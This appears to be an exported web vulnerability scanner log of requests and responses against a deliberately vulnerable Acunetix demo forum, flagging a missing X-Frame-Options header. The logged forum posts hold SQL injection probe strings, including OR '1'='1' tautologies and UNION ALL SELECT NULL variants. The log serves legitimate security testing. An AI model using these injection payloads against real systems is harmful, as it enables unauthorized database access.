| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=22 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:31 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=23 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3084 |
| Response Body - size: 3,084 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:41 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 3085 |
| Response Body - size: 3,085 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3086 |
| Response Body - size: 3,086 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:43 GMT Content-Length: 3067 |
| Response Body - size: 3,067 bytes. |
